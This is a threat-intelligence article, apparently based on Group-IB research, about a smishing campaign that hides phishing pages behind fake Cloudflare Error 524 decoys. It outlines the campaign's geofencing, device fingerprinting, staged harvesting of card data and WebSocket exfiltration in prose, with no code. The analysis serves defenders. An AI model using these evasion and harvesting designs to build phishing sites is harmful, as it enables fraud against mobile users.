Advanced Smishing Campaign Leverages Cloudflare Error Decoys for Global Evasion

A highly sophisticated smishing and phishing operation is currently targeting mobile users on a global scale. By impersonating over 260 major brands across 72 different countries, this campaign utilizes a clever evasion strategy centered around fraudulent Cloudflare “Error 524” pages to bypass traditional security filters.Active since the latter half of 2025, the campaign has demonstrated the industrial maturity of Phishing-as-a-Service (PhaaS) ecosystems. While initially concentrated in Latin America, the threat actor has successfully expanded operations into Europe, the APAC region, and North America.

The campaign’s target profile primarily includes telecommunications providers, followed closely by financial institutions and consumer loyalty programs. Researchers suggest this regional preference is driven by a combination of weak SMS anti-spoofing protocols, a “mobile-first” consumer culture, and the high efficacy of social engineering pretexts involving reward programs.

What sets this campaign apart is its layered anti-analysis architecture. To evade automated security scanners, web crawlers, and manual researcher inspection, the malicious domains employ conditional rendering. If a visitor is detected as being from a non-target geography or is accessing via a desktop environment, the site serves a convincing, realistic Cloudflare “Error 524” timeout page. This decoy effectively hides the malicious payload from hosting providers and security tools.

The filtering mechanism is highly granular, utilizing client-side geolocation checks and device fingerprinting. The actual phishing interface is only served to verified mobile users within targeted jurisdictions.

According to Group-IB’s Digital Risk Protection team, the attackers have deployed at least 4,389 phishing domains, with Mexico, Chile, and Colombia serving as primary targets.

Breakdown of the smishing campaign’s most targeted industries in LATAM (Source: Group-IB).

Technically, this conditional logic is embedded within a Base64-encoded Single-Page Application (SPA). This allows the malicious logic to be decoded and executed dynamically at runtime, making static code analysis extremely difficult for defenders.

Technical Breakdown: The Error 524 Decoy Lifecycle

The attack chain typically commences with an SMS-based lure—often involving urgent themes like expiring rewards or failed deliveries—sent from spoofed local numbers. The embedded shortened URLs redirect users to phishing domains that initially appear to be empty or broken.

The websites utilize a Cloudflare error page, displaying various error codes, as a deceptive landing page (Source: Group-IB).

While Latin America remains a core focus, the campaign has established significant footprints elsewhere:

• Europe: 673 confirmed domains, primarily targeting financial and logistics sectors in the Netherlands and Germany.
• APAC: 238 domains, led by Australia, focusing on telecommunications and government impersonation.

Once a user passes the initial device and location validation, they are presented with a brand-specific interface tailored to their region. The data harvesting is conducted in stages: first collecting basic identification (name, email, phone), and then escalating to highly sensitive PII and full credit card credentials.

A notable technical optimization is the use of minimal validation for payment data. Rather than performing real-time bank authorization—which would introduce latency and increase the risk of detection—the attackers rely on simple checksum (Luhn algorithm) verification. This allows for high-speed data collection and maximizes throughput.

For data exfiltration, the attackers have moved beyond simple HTTP POST requests. Instead, they employ encrypted WebSocket (WSS) channels. This establishes a persistent, bidirectional connection between the victim’s browser and the attacker’s Command and Control (C2) server. Harvested data is transmitted as binary-encoded payloads, while “heartbeat” signals are used to monitor session integrity and user dwell time.

Solicitation of full credit card credentials, including card number, expiry date, and CVV (Source: Group-IB).

Infrastructure analysis shows a sophisticated use of Cloudflare as a reverse proxy to mask origin servers, which are frequently hosted on Tencent Cloud and Alibaba Cloud infrastructure. This multi-layered approach complicates attribution and makes takedown efforts difficult, as blocking the CDN layer does not necessarily neutralize the backend infrastructure.

By combining rapid domain cycling (using low-cost TLDs like .top, .ink, and .click) with real-time encrypted exfiltration and advanced evasion, this campaign represents a significant evolution in phishing tradecraft. It highlights a shift toward cloud-native, highly automated, and performance-monitored cybercrime operations.